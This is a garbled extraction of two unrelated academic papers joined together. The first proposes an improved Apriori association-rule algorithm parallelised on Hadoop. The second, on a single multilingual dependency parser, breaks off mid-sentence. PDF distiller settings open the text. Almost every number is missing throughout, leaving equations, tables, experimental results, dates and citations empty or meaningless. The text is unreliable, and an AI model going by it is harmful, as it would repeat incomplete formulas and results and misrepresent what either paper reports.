/endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - research and improvement of apriori algorithm based on hadoop gao pengfei a , wang jianguo b and liu pengcheng c school of computer science and engineering xi'an technological university xi'an, , shaanxi province, china a gaopf @gmail.com, b wjg_xit@ .com, c @qq.com abstract—association rules can forcefully get a horizontal relation in the big data, the apriori algorithm is one of the most significant association rules. traditional mining based on parallel apriori algorithms needs much more time in data io with the increasing size of large transaction database. this paper improves the apriori algorithm from compressing transactions, reducing the number of scans and simplifying candidate set generation. and then the improved algorithm is parallelized on the hadoop framework. the experiments show that this improved algorithm is suitable for large-scale data mining and has good scalability and effectiveness. keywords-apriori algorithm; hadoop; association rules i. introduction in the context of the development of big data “spraying wells”, there is frequently a close relationship between vast amounts of data[ ]. analysis and decision making through data mining have become the mainstream of social development. in order to better find the relevance of transaction data sets, some researchers have discovered the concept of association rule mining technology[ ]. with the attention of many researchers at home and abroad caused by the conception of the concept, they have done a lot of analysis in this field and put forward many data mining algorithms. one of the most famous association rule algorithms is the apriori algorithm, which is a classic association rule algorithm designed by agrawal[ - ] in . it is a level-by-level search iteration method that constructs a k-item set to constitute a k+ -item set. the main ideas of this algorithm are: firstly, all frequency sets are counted from the transaction database, and the support of this frequent set must not be less than the minimum support degree; secondly it enters into the process of strong association rule generation, and the rules need to satisfy the support and confidence thresholds at the same time; thirdly, only all rules that contain collection items are retained. once these rules are retained and generated, that are greater than or equal to the minconfidence. the design of the hadoop[ ] framework originated was from an open source project developed by the apache organization foundation. because of its inter-temporal significance, the hadoop framework has been widely used in the information field at home and abroad. there are two important modules in the hadoop frame--distributed file system hdfs and distributed computing frame mapreduce[ ]. as a distributed file system , hdfs functions aims to implement data storage. it will work in conjunction with the computational framework. mapreduce works to provide the underlying support for data calculations; and the idea of mapreduce[ - ] is based on a paper by google. in short, its core method is "the decomposition of tasks and the statute of results." ii. brief and research status of apriori algorithm a. overview of apriori algorithm the apriori algorithm is a level-by-level search iterative method that consists of a k-item set to construct a (k+ )-item set. first, obtain a frequent -item set. l can generate a frequent -item set l , and l can generate a frequent -item set l . according to this rule, when a frequent k-item international journal of advanced network, monitoring and controls volume , no. , set cannot be found, the algorithm ends[ - ]. the specific operation is as follows: ) iterate through the initial transaction database and count the frequency of occurrence of the candidate set. the result is the support of the project. all projects whose all supports level no lower than the preset threshold generate a frequent -item set l . ) the algorithm uses l join l to form a candidate c -item set c . ) using the items in c , traverse the database again to obtain the support degree of each candidate set. all projects with support levels not lower than the support level generate frequent -item set l . ) the algorithm uses l join l to form a set c of candidate -item sets. ) using the items in c to traverse the database again, the support degree of each candidate set can be obtained. all items with support levels not lower than the support level generate frequent -item set l . the above process is performed iteratively until the candidate set c k is empty. the apriori algorithm does multiple io operations on the database. each stage consists of two parts, namely connection and pruning. figure . apriori flow b. apriori algorithm instance analysis original transaction t ={a,c,d}, t ={b,c,e}, t ={a,b,c,e}, t ={b,e}. suppose min_sup= . then l ={{a},{b},{c},{e}}, l ={{a,c},{b,c},{b,e},{c, e}}. ) self join, c =l ×l ={{a,c},{b,c},{b,e}, {c,e}} × {{a,c},{b,c},{b,e},{c,e}}={{a,b,c},{a,c,e},{b,c,e}} ) pruning, any frequent item set, its subset must also be frequent. for candidate set c , clearing those subsets with infrequent options: the two items subset of {a,b,c} are {a,b},{a,c},{b,c}, where {a,b} is not an element of l , so remove this option.; the two items subset of {a,c,e} are {a,c},{a,e},{c,e}, where {a,e} is not an element of l , so remove this option; all the two items subset generated by {b,c,e} are {b,c},{b,e},{c,e}, the subsets produced by {b,c,e} all satisfy the requirements of l . therefore, this option is not deleted. ) in this way, c ={{b,c,e}} obtained after pruning. figure . apriori algorithm execution process c. the shortcomings of apriori algorithm ) when the apriori algorithm generates the candidate item set, it needs to perform the self-connection operation on the frequent itemsets obtained in the previous step. then scan the transaction data set again and compare the candidate set formed by the self-connection with min_sup. during the self-connection operation, a large amount of comparison work will be performed. ) apriori algorithm need to rescan transaction datasets before pruning, and then compare with min_sup. therefore, when the size of the transaction dataset is getting larger and larger, each scan will consume a lot of time, resulting in inefficient mining. international journal of advanced network, monitoring and controls volume , no. , ) in the current situation where the data information has a high dimension and the type is complex, the classical apriori algorithm can't satisfy users. ) because the classic apriori algorithm is only applicable to a single machine, when the size of transaction data sets gradually becomes larger and larger, it will lead to inefficient mining, insufficient storage space, and even system crashes. iii. parallel mec-apriori algorithm based on mapreduce apriori algorithm a. reduce frequent item sets self-connection comparison times and pruning steps in the processing of candidate sets, a method of transaction compression characteristics has been introduced. that is, according to the n-dimensional data item set, if itself is not a frequent item set, then the n- dimensional subset of the n-dimensional data item set is also not a frequent item set. therefore, in the mining of candidate sets in the transaction database, the number of candidate candidate sets is compared and deleted because of the method of transaction compression characteristics, so that the number of candidate sets is gradually reduced, and the time efficiency of mining frequent itemsets is improved. b. reduce the number of scanned databases when mining frequent itemsets, the original transaction database is converted into a vertical data table, and then scan the vertical data table to mine frequent itemsets, because only one transaction database was scanned, a problem with frequent i/o was solved to some extent. c. combining apriori algorithm and hadoop platform with the ever-increasing size of data, the traditional apriori algorithm has been difficult to support its massive database of transactions. the solution to this problem is to add the hadoop distributed platform to the apriori algorithm[ ], which not only makes the traditional apriori algorithm run more efficiently, but also eases the storage pressure of the transaction database. ) generate frequent itemsets the flow chart in this stage is shown in figure. figure . generate frequent itemsets flow a) the way of data blocks formatting for the function of interface named input format implements record reader(interface) is to convert data blocks into key-value pairs, eg: <key ,value >. b) perform map task the idea of the first step is to generate the frequent item sets of each block. c) perform reduce tasks the key-value data output by the combiner function is used as the input data of the reduce phase. after a series of merging processes, some frequent item sets of the data module are obtained as a global candidate item set. d) scan transaction data set d call the map function to rescan the formed global candidate frequent item set, and self- join , compare the minimum support count with the set of transaction items formed by the self-join, if it is less than the minimum support, then the last local frequent itemset is the final global frequent itemset, then pass it to the reduce function and summarize it. instead, it is necessary to iterate the local frequent itemsets until a frequent itemset is generated. ) generation of association rules after association rules mine frequent item sets, it is necessary to generate strong rules. the emergence of strong rules is shown in figure. : international journal of advanced network, monitoring and controls volume , no. , figure . generate strong rules flow a) in the transaction dataset that holds the text, the input data of the map must exist in the form of a key-value pair, so each row of data can be treated as a transaction. the key in a key-value pair is the offset of each row of data, and the value is represented as this row of data. b) these key-value pairs are used as the input of the map function, and then a set of frequent items conforming to the actual situation is obtained according to the set support threshold. c) the output of combiner function in map stage is used as the input data of reduce stage, then it is processed according to the local frequent itemsets generated in map stage, and finally the strong association rules of the output are stored in hdfs. iv. experimental assessment and analysis a. setting up a hadoop cluster environment the size of a hadoop cluster is arbitrary. a small cluster can consist of a namenode and several datanodes. and a large cluster can consist of a namenode and hundreds of datanodes. local mode, pseudo-distribution mode and fully-distributed mode are three modes built by hadoop clusters. considering the hardware configuration problem, this paper choses to use a virtual machine to set up a cluster environment, and the number of nodes in the cluster is , as shown in figure. figure . build a cluster environment b. data comparison experiment ) uci experimental data this experiment selects the retail file in the uci database (association rules to study the classic data set) as the experimental transaction data set. by comparing the mec-apriori algorithm with the traditional apriori algorithm, the results show that the time performance of the mec-apriori algorithm has been greatly improved in the mining of frequent itemsets and candidate itemsets, thus verifying the efficiency and feasibility of the improved algorithm. ) implementing the mec-apriori algorithm model first, the experimental data set in the file retail is selected, and the data set in the retail is mined using the new mec-apriori algorithm, and then the association rule is obtained according to the user-defined support degree and the confidence threshold. figure . simulation flow international journal of advanced network, monitoring and controls volume , no. , ) experiment content and result analysis experiment : performance comparison between single apriori algorithm and mec-apriori algorithm the transaction data set for this experiment is stored as a file, performance analysis of mining time before and after improved with nodes hadoop cluster test algorithm. first, on the premise that the number of nodes in the hadoop cluster is unchanged, continuously increase the number of item sets in the experimental data item set, and set the minimum support to the same, that is, min_sup= . . the experimental results are shown in table . . table.i. comparing apriori with mec-apriori mining time transaction itemsets apriori mining time/s mec-apriori mining time /s . . . . . . . . . . according to the experiment, the result obtained, convert the result to a line chart to make it more intuitive, figure shows the time performance between mec-apriori and apriori. horizontal axis: number of transaction item sets. vertical axis: time/s. figure . improved and improved time performance charts from the figure , the mec-apriori algorithm and the classical apriori algorithm are on the premise of the same number of transaction itemsets, it is often better than apriori algorithm in temporal performance, and with the increasing number of transaction item sets, apriori algorithm running on a computer can significantly improve the time of mining analysis. however, with the mec-apriori algorithm, as the number of transaction item sets increases, the time performance is getting better and better. because with the increase in the number of transaction items, the nodes of the distributed cluster will gradually increase. in summary, the improved mec-apriori algorithm is superior to the classic apriori algorithm in temporal performance. experiment : performance comparison between apriori algorithm and mec-apriori algorithm under different supporting degrees. first ,this paper test the data set retail, select the minimum support threshold range [ . , . ]. and within this range, evenly increase the step: . , so there will be a threshold of . then, this paper use the data set retail to run the apriori algorithm and the mec-apriori algorithm respectively, and record the running time (note that the running time is second). figure shows the experimental data obtained by executing the above three algorithms. horizontal axis: support; vertical axis: time/s. experiments show that the mec-apriori algorithm runs much less time than the apriori algorithm under different support levels. the higher the support, the apriori algorithm will run a little longer than the mec-apriori algorithm. in summary, the temporal performance of the mec-apriori algorithm under different support levels is always superior to the traditional apriori algorithm. figure . performance comparison under different support levels international journal of advanced network, monitoring and controls volume , no. , v. conclusion aiming at the traditional apriori algorithm, when mining frequent itemsets, you need to continuously scan transaction data sets , so that the system i / o overhead and other shortcomings. in this paper, we improved apriori algorithm in three aspects: compression in the transaction, reducing the number of scanning areas, and simplifying the candidate set generation. at the same time, the improved algorithm is parallelized in the hadoop framework. the simulation results show that compared with the traditional apriori algorithm, the mec-apriori algorithm has good performance and security in temporal performance, mining frequent candidate itemsets and different support levels. however, it needs to be continuously improved in the future work. references [ ] k.wang, y.he, j.han. mining frequent itemsets using support constraints. proc int. conf. very large data bases[j]. cairo, egypt, . : - . [ ] yan xiaofei. research on association rule mining algorithm[d]. chongqing: chongqing university, : - . [ ] agrawal r.srikant r.fast algorithm for mining a ssociation rules[c]//proceedings of th int. conf. very large data bases(vldb). morgan kaufman press, : - . [ ] ren w j , yu b w. improved apriori algorithm based on matrix reducation[j]. computer and modern, , . - . (in chinese) [ ] gunarathne t , wu tl, qiu j ,et al .mapreduce in the clouds for science[c]// ieee second international conference on cloud computing technology and science (cloudcom). ieee, ; - [ ] dean j,ghemawat s. mapreduce: simplified data processing on large clusters[j]. communications of the acm, , ( ): - . [ ] he b s, tao m, yuan x m. alternating direction me-thod with gaussian back substitution for separable convex programming [j]. siam j. optimization, , ( ): - . [ ] he b s,liao l z,yuan x m. alternating projection based prediction-correction methods for structured variational inequalities[j]. computational mathematics, , ( ): - . [ ] chen z m, wan l, yang q z. an inexact direction methodfor structured variational inequalities[j]. journal of optimization theory & applications, , ( ): - . [ ] lu jiaheng. hadoop combat [m]. beijing: mechanical industry press, : - . many languages, one parser waleed ammar♦ george mulcaire♥ miguel ballesteros♠♦ chris dyer♦ noah a. smith♥ ♦school of computer science, carnegie mellon university, pittsburgh, pa, usa ♥computer science & engineering, university of washington, seattle, wa, usa ♠nlp group, pompeu fabra university, barcelona, spain wammar@cs.cmu.edu, gmulc@uw.edu, miguel.ballesteros@upf.edu cdyer@cs.cmu.edu, nasmith@cs.washington.edu abstract we train one multilingual model for depen- dency parsing and use it to parse sentences in several languages. the parsing model uses (i) multilingual word clusters and em- beddings; (ii) token-level language informa- tion; and (iii) language-specific features (fine- grained pos tags). this input representation enables the parser not only to parse effec- tively in multiple languages, but also to gener- alize across languages based on linguistic uni- versals and typological similarities, making it more effective to learn from limited annota- tions. our parser’s performance compares fa- vorably to strong baselines in a range of data scenarios, including when the target language has a large treebank, a small treebank, or no treebank for training. introduction developing tools for processing many languages has long been an important goal in nlp (rösner, ; heid and raab, ), but it was only when statistical methods became standard that massively multilingual nlp became economical. the main- stream approach for multilingual nlp is to design language-specific models. for each language of in- terest, the resources necessary for training the model are obtained (or created), and separate parameters are fit for each language separately. this approach is simple and grants the flexibility of customizing as of , the total number of native speakers of the hundred most popular languages only accounts for % of the world’s population (wikipedia, ). the model and features to the needs of each lan- guage, but it is suboptimal for theoretical and prac- tical reasons. theoretically, the study of linguistic typology tells us that many languages share mor- phological, phonological, and syntactic phenomena (bender, ); therefore, the mainstream approach misses an opportunity to exploit relevant supervi- sion from typologically related languages. practi- cally, it is inconvenient to deploy or distribute nlp tools that are customized for many different lan- guages because, for each language of interest, we need to configure, train, tune, monitor, and occasion- ally update the model. furthermore, code-switching or code-mixing (mixing more than one language in the same discourse), which is pervasive in some gen- res, in particular social media, presents a challenge for monolingually-trained nlp models (barman et al., ). in parsing, the availability of homogeneous syn- tactic dependency annotations in many languages (mcdonald et al., ; nivre et al., b; agić et al., ; nivre et al., a) has created an opportunity to develop a parser that is capable of parsing sentences in multiple languages, address- ing these theoretical and practical concerns. a multilingual parser can potentially replace an array of language-specific monolingually-trained parsers while our parser can be used to parse input with code- switching, we have not evaluated this capability due to the lack of appropriate data. although multilingual dependency treebanks have been available for a decade via the and conll shared tasks (buchholz and marsi, ; nivre et al., ), the tree- bank of each language was annotated independently and with its own annotation conventions. transactions of the association for computational linguistics, vol. , pp. – , . action editor: david chiang. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. (for languages with a large treebank). the same approach has been used in low-resource scenarios (with no treebank or a small treebank in the target language), where indirect supervision from auxiliary languages improves the parsing quality (cohen et al., ; mcdonald et al., ; zhang and barzi- lay, ; duong et al., a; duong et al., b; guo et al., ), but these models may sacrifice ac- curacy on source languages with a large treebank. in this paper, we describe a model that works well for both low-resource and high-resource scenarios. we propose a parsing architecture that takes as in- put sentences in several languages, optionally pre- dicting the part-of-speech (pos) tags and input lan- guage. the parser is trained on the union of avail- able universal dependency annotations in different languages. our approach integrates and critically relies on several recent developments related to de- pendency parsing: universal pos tagsets (petrov et al., ), cross-lingual word clusters (täckström et al., ), selective sharing (naseem et al., ), universal dependency annotations (mcdonald et al., ; nivre et al., b; agić et al., ; nivre et al., a), advances in neural network architec- tures (chen and manning, ; dyer et al., ), and multilingual word embeddings (gardner et al., ; guo et al., ; ammar et al., ). we show that our parser compares favorably to strong baselines trained on the same treebanks in three data scenarios: when the target language has a large tree- bank (table ), a small treebank (table ), or no treebank (table ). our parser is publicly available. overview our goal is to train a dependency parser for a set of target languages lt, given universal dependency annotations in a set of source languages ls. ide- ally, we would like to have training data in all tar- get languages (i.e., lt ⊆ ls), but we are also inter- ested in the case where the sets of source and target languages are disjoint (i.e., lt ∩ ls = ∅). when all languages in lt have a large treebank, the main- stream approach has been to train one monolingual parser per target language and route sentences of a we discuss data requirements in the next section. https://github.com/clab/ language-universal-parser given language to the corresponding parser at test time. in contrast, our approach is to train one pars- ing model with the union of treebanks in ls, then use this single trained model to parse text in any lan- guage in lt, hence the name “many languages, one parser” (malopa). malopa strikes a balance be- tween: ( ) enabling cross-lingual model transfer via language-invariant input representations; i.e., coarse pos tags, multilingual word embeddings and mul- tilingual word clusters, and ( ) tweaking the be- havior of the parser depending on the current input language via language-specific representations; i.e., fine-grained pos tags and language embeddings. in addition to universal dependency annotations in source languages (see table ), we use the follow- ing data resources for each language in l = lt∪ls: • universal pos annotations for training a pos tag- ger, • a bilingual dictionary with another language in l for adding cross-lingual lexical information, • language typology information, • language-specific pos annotations, and • a monolingual corpus. novel contributions of this paper include: (i) us- ing one parser instead of an array of monolingually- trained parsers without sacrificing accuracy on lan- guages with a large treebank, (ii) an effective neural network architecture for using language embeddings to improve multilingual parsing, and (iii) a study of how automatic language identification affects the performance of a multilingual dependency parser. while not the primary focus of this paper, we also show that a variant of our parser outperforms pre- vious work on multi-source cross-lingual parsing in see § . for details. our best results make use of this resource. we require that all languages in l are (transitively) connected. the bilingual dictionaries we used are based on unsupervised word align- ments of parallel corpora, as described in guo et al. ( ). see § . for details. see § . for details. our best results make use of this resource. see § . for details. this is only used for training word embeddings with ‘mul- ticca,’ ‘multicluster’ and ‘translation-invariance’ methods in table . we do not use this resource when we compare to pre- vious work. https://github.com/clab/language-universal-parser https://github.com/clab/language-universal-parser german (de) english (en) spanish (es) french (fr) italian (it) portuguese (pt) swedish (sv) udt train ( ) ( ) ( ) ( ) ( ) ( ) ( ) dev. ( ) ( ) ( ) ( ) ( ) ( ) ( ) test ( ) ( ) ( ) ( ) ( ) ( ) ( ) ud . train ( ) ( ) ( ) ( ) ( ) ( ) ( ) dev. ( ) ( ) ( ) ( ) ( ) ( ) ( ) test ( ) ( ) ( ) ( ) ( ) ( ) ( ) tags - - - table : number of sentences (tokens) in each treebank split in universal dependency treebanks (udt) version . and universal dependencies (ud) version . for the languages we experiment with. the last row gives the number of unique language-specific fine-grained pos tags used in a treebank. low resource scenarios, where languages in lt have a small treebank (see table ) or where lt ∩ls = ∅ (see table ). in the small treebank setup with , token annotations, we show that our parser consis- tently outperforms a strong monolingual baseline with . absolute las (labeled attachment score) points per language, on average. parsing model recent advances suggest that recurrent neural net- works, especially long short-term memory (lstm) architectures, are capable of learning useful repre- sentations for modeling problems of sequential na- ture (graves et al., ; sutskever et al., ). in this section, we describe our language-universal parser, which extends the stack lstm (s-lstm) parser of dyer et al. ( ). . transition-based parsing with s-lstms this section briefly reviews dyer et al.’s s-lstm parser, which we modify in the following sections. the core parser can be understood as the sequential manipulation of three data structures: • a buffer (from which we read the token sequence), • a stack (which contains partially-built parse trees), and • a list of actions previously taken by the parser. the parser uses the arc-standard transition system (nivre, ). at each timestep t, a transition ac- tion is applied that alters these data structures ac- cording to table . in a preprocessing step, we transform nonprojective trees in the training treebanks to pseudo-projective trees using the “baseline” scheme in (nivre and nilsson, ). we evaluate against the original nonprojective test set. along with the discrete transitions of the arc- standard system, the parser computes vector repre- sentations for the buffer, stack and list of actions at time step t denoted bt, st, and at, respectively. the parser state at time t is given by: pt = max{ ,w[st; bt; at] + wbias} ( ) where the matrix w and the vector wbias are learned parameters. the matrix w is multiplied by the vector [st; bt; at] created by the concatenation of st,bt,at. the parser state pt is then used to define a categorical distribution over possible next actions z: p(z | pt) = exp ( g>z pt + qz ) ∑ z′ exp ( g>z′pt + qz′ ) ( ) where gz and qz are parameters associated with ac- tion z. the selected action is then used to update the buffer, stack and list of actions, and to compute bt+ , st+ and at+ accordingly. the model is trained to maximize the log- likelihood of correct actions. at test time, the parser greedily chooses the most probable action in every time step until a complete parse tree is produced. the following sections describe our extensions of the core parser. more details about the core parser can be found in dyer et al. ( ). . token representations the vector representations of input tokens feed into the stack-lstm modules of the buffer and the stack. a stack-lstm module is used to compute the vector rep- resentation for each data structure, as detailed in dyer et al. ( ). the total number of actions is + × the number of unique dependency labels in the treebank used for training, but we only consider actions which meet the arc-standard preconditions in fig. . stackt buffert action dependency stackt+ buffert+ u,v,s b reduce-right(r) u r→ v u,s b u,v,s b reduce-left(r) u r← v v,s b s u,b shift — u,s b table : parser transitions indicating the action applied to the stack and buffer at time t and the resulting stack and buffer at time t + . for monolingual parsing, we represent each token by concatenating the following vectors: • a fixed, pretrained embedding of the word type, • a learned embedding of the word type, • a learned embedding of the brown cluster, • a learned embedding of the fine-grained pos tag, • a learned embedding of the coarse pos tag. for multilingual parsing with malopa, we start with a simple delexicalized model where the token representation only consists of learned embeddings of coarse pos tags, which are shared across all lan- guages to enable model transfer. in the following subsections, we enhance the token representation in malopa to include lexical embeddings, language embeddings, and fine-grained pos embeddings. . lexical embeddings previous work has shown that sacrificing lexical fea- tures amounts to a substantial decrease in the perfor- mance of a dependency parser (cohen et al., ; täckström et al., ; tiedemann, ; guo et al., ). therefore, we extend the token representa- tion in malopa by concatenating learned embed- dings of multilingual word clusters, and pretrained multilingual embeddings of word types. multilingual brown clusters. before training the parser, we estimate brown clusters of english words and project them via word alignments to words in other languages. this is similar to the ‘projected clusters’ method in täckström et al. ( ). to go from brown clusters to embeddings, we ignore the hierarchy within brown clusters and assign a unique parameter vector to each cluster. multilingual word embeddings. we also use guo et al.’s ( ) ‘robust projection’ method to pre- train multilingual word embeddings. the first step in ‘robust projection’ is to learn embeddings for en- glish words using the skip-gram model (mikolov et al., ). then, we compute an embedding of non- english words as the weighted average of english word embeddings, using word alignment probabili- ties as weights. the last step computes an embed- ding of non-english words which are not aligned to any english words by averaging the embeddings of all words within an edit distance of in the same language. we experiment with two other methods— ‘multicca’ and ‘multicluster,’ both proposed by ammar et al. ( )—for pretraining multilingual word embeddings in § . . ‘multicca’ uses a lin- ear operator to project pretrained monolingual em- beddings in each language (except english) to the vector space of pretrained english word embed- dings, while ‘multicluster’ uses the same embed- ding for translationally-equivalent words in different languages. the results in table illustrate that the three methods perform similarly on this task. . language embeddings while many languages, especially ones that belong to the same family, exhibit some similar syntac- tic phenomena (e.g., all languages have subjects, verbs, and objects), substantial syntactic differences abound. some of these differences are easy to char- acterize (e.g., subject-verb-object vs. verb-subject- object, prepositions vs. postpositions, adjective- noun vs. noun-adjective), while others are sub- tle (e.g., number and positions of negation mor- phemes). it is not at all clear how to translate de- scriptive facts about a language’s syntax into fea- tures for a parser. consequently, training a language-universal parser on treebanks in multiple source languages requires caution. while exposing the parser to a diverse set of syntactic patterns across many lan- guages has the potential to improve its performance in each, dependency annotations in one language will, in some ways, contradict those in typologically different languages. for instance, consider a context where the next word on the buffer is a noun, and the top word on the stack is an adjective, followed by a noun. tree- banks of languages where postpositive adjectives are typical (e.g., french) will often teach the parser to predict reduce-left, while those of languages where prepositive adjectives are more typical (e.g., english) will teach the parser to predict shift. inspired by naseem et al. ( ), we address this problem by informing the parser about the input lan- guage it is currently parsing. let l be the input vector representation of a particular language. we consider three definitions for l: • one-hot encoding of the language id, • one-hot encoding of individual word-order prop- erties, and • averaged one-hot encoding of wals typological properties (including word-order properties). it is worth noting that the first definition (language id) turns out to work best in our experiments. we use a hidden layer with tanh nonlinearity to compute the language embedding l′ as: l′ = tanh(ll + lbias) where the matrix l and the vector lbias are addi- tional model parameters. we modify the parsing ar- chitecture as follows: • include l′ in the token representation (which feeds into the stack-lstm modules of the buffer and the stack as described in § . ), the files which contain these definitions are available at https://github.com/clab/ language-universal-parser/tree/master/ typological_properties. the world atlas of language structures (wals; dryer and haspelmath, ) is an online portal documenting typo- logical properties of , languages (as of july ). we use the same set of wals features used by zhang and barzilay ( ), namely a (order of subject and verb), a (order of object and verb), a (order of adposition and noun phrase), a (order of genitive and noun), and a (order of adjective and noun). some wals features are not annotated for all languages. therefore, we use the average value of all languages in the same genus. we rescale all values to be in the range [− , ]. • include l′ in the action vector representation (which feeds into the stack-lstm module that represents previous actions as described in § . ), and • redefine the parser state at time t as pt = max{ ,w[st; bt; at; l′] + wbias}. intuitively, the first two modifications allow the input language to influence the vector representation of the stack, the buffer and the list of actions. the third modification allows the input language to in- fluence the parser state which in turn is used to pre- dict the next action. in preliminary experiments, we found that adding the language embeddings at the token and action level is important. we also experi- mented with computing more complex functions of (st,bt,at, l′) to define the parser state, but they did not help. . fine-grained pos tag embeddings tiedemann ( ) shows that omitting fine-grained pos tags significantly hurts the performance of a de- pendency parser. however, those fine-grained pos tagsets are defined monolingually and are only avail- able for a subset of the languages with universal de- pendency treebanks. we extend the token representation to include a fine-grained pos embedding (in addition to the coarse pos embedding). we stochastically dropout the fine-grained pos embedding for each token with % probability (srivastava et al., ) so that the parser can make use of fine-grained pos tags when available but stay reliable when the fine-grained pos tags are missing. . predicting pos tags the model discussed thus far conditions on the pos tags of words in the input sentence. however, gold pos tags may not be available in real applications (e.g., parsing the web). here, we describe two mod- ifications to (i) model both pos tagging and depen- dency parsing, and (ii) increase the robustness of the parser to incorrect pos predictions. tagging model. let x , . . . ,xn, y , . . . ,yn, z , . . . ,z n be the sequence of words, pos tags, and parsing actions, respectively, for a sentence of length n. we define the joint distribution of a pos https://github.com/clab/language-universal-parser/tree/master/typological_properties https://github.com/clab/language-universal-parser/tree/master/typological_properties https://github.com/clab/language-universal-parser/tree/master/typological_properties tag sequence and parsing actions given a sequence of words as follows: p(y , . . . ,yn,z , . . . ,z n | x , . . . ,xn) = n∏ i= p(yi | x , . . . ,xn) × n∏ j= p(zj | x , . . . ,xn,y , . . . ,yn,z , . . . ,zj− ) where p(zj | . . .) is defined in eq. , and p(yi | x , . . . ,xn) uses a bidirectional lstm (graves et al., ). huang et al. ( ) show that the perfor- mance of a bidirectional lstm pos tagger is on par with a conditional random field tagger. we use slightly different token representations for tagging and parsing in the same model. for tag- ging, we construct the token representation by con- catenating the embeddings of the word type (pre- trained), the brown cluster and the input language. this token representation feeds into the bidirectional lstm, followed by a softmax layer (at each posi- tion) which defines a categorical distribution over possible pos tags. for parsing, we construct the to- ken representation by further concatenating the em- beddings of predicted pos tags. this token repre- sentation feeds into the stack-lstm modules of the buffer and 